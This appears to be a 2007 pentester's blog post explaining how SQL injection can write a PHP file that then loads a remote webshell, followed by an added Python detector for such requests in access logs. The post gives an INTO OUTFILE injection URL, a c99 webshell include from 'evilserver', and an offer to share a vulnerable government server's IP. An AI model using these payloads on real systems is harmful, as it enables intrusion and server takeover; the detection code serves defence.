What I do

I am an Information Risk Consultant and Penetration Tester. I specialize mostly in penetrating secure networks and computer systems, where I simulate an organized professional attack against your organization; afterwards a detailed report summarizing the weaknesses and exploited vectors is delivered. This will help you gain control over your infrastructure's security and maximize your protection.

Thursday, May 10, 2007

ANSWERING THE QUESTIONS ON SQL INJECTION AND BUILDING AN RFI SCRIPT IN-HOUSE

These came up in the comments on previous posts, so I will try to explain them as best I can.

The best way to defend against it is to have port 3306 filtered (check that server: a top government site, but one of the most insecure; mail me if you need the IP).

slax ~ # nmap -sS -P0 XXX.XXX.XXX.XXX

Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-05-10 12:02 EAT

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
143/tcp closed imap
443/tcp open https
631/tcp closed ipp
3306/tcp open mysql
10000/tcp closed snet-sensor-mgmt


...and have the latest kernel patch on your box. As long as an RFI bug may exist in your site, or let's say in your CMS, a knowledgeable hacker will still get through, so even a strong password won't matter much if he is already browsing your server over port 80. The only thing that really helped against this kind of attack last year was having PHP safe_mode ON (secure), but these days there are so many ways of bypassing it, Lol!

This was well shown after the Month of PHP Bugs, in January and February this year, when a lot of PoCs were released to the public by Hardened PHP and other communities.

To all: the best way to secure your box is to know how an intruder will get through, by running all types of pentest attacks against it, whether black-box or white-box penetration testing.

Something else before I go: SQL injection can help an attacker build up an RFI attack on a server. Starting from an injection where he is able to read files, e.g. load_file('etc/password'), he can create his RFI by crafting an injection like:

www.site.com/vulnerablescripts.php?id=-1+union+select+',1,2,3,4+from+mysql.user/**/into/**/outfile/**/'/home/www/public/http/vul.php'/*

So we will have another file on the server named vul.php, which will contain a straightforward RFI bug.

Then remote-include a c99shell, c100, r57 or one of the other privately modded webshells:

www.site.com/vul.php?cmd=http://evilserver/c99.txt

Just a simple one, though there are more complex ones that need a lot of experience.
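From the defender's side, the two request shapes described above (an injection that reads or writes server files via load_file / into outfile, and the follow-up include of a remote URL through a parameter) are easy to spot in web server logs. The following is an added example, not code from the original post: it scans Apache-style combined log lines and reports the suspicious parameter. The log lines and client IPs are constructed; the parameter names id and cmd are the ones used in the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Apache/nginx combined log line; only the client IP and request target are needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# SQL injection that reads or writes files on the database host.
SQLI_FILE_RE = re.compile(r'\b(?:union\s+(?:all\s+)?select|into\s+(?:out|dump)file|load_file\s*\()', re.IGNORECASE)
# A parameter whose value is a remote URL: the classic include() RFI shape.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def normalize(value):
    """Undo common evasions: a second layer of URL-encoding, /**/ comment
    padding instead of spaces, and irregular whitespace."""
    v = unquote_plus(value)            # parse_qsl decoded once; this catches double-encoding
    v = re.sub(r'/\*.*?\*/', ' ', v)   # MySQL inline comments used as separators
    return re.sub(r'\s+', ' ', v)

def classify_request(target):
    """Return [(kind, parameter_name), ...] for one request target (path + query)."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        v = normalize(value)
        if REMOTE_URL_RE.match(v):
            findings.append(('rfi', name))
        if SQLI_FILE_RE.search(v):
            findings.append(('sqli-file', name))
    return findings

def scan_access_log(lines):
    """Scan log lines and return one dict per suspicious parameter seen."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue   # not a request line we understand; skip it
        for kind, param in classify_request(m.group('target')):
            hits.append({'ip': m.group('ip'), 'kind': kind, 'param': param,
                         'target': m.group('target')})
    return hits

# Constructed sample log (203.0.113.0/24 is the documentation range); the
# request shapes mirror the two shown in the post above.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2007:12:02:01 +0300] "GET /index.php?id=42 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/May/2007:12:02:05 +0300] "GET /vulnerablescripts.php?id=-1+union+select+%27,1,2,3,4+from+mysql.user/**/into/**/outfile/**/%27/home/www/public/http/vul.php%27/* HTTP/1.1" 200 88',
    '203.0.113.9 - - [10/May/2007:12:02:09 +0300] "GET /vul.php?cmd=http://evilserver/c99.txt HTTP/1.1" 200 4096',
]

if __name__ == '__main__':
    for h in scan_access_log(SAMPLE_LOG):
        print(h['ip'], h['kind'], h['param'], h['target'])
```

Filtering port 3306 stops the outfile write from being reached over the network, but the injection itself is still visible on port 80, which is why this check belongs in log monitoring or a WAF rule rather than the firewall.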

I tried to explain it with an example.

/Chuks
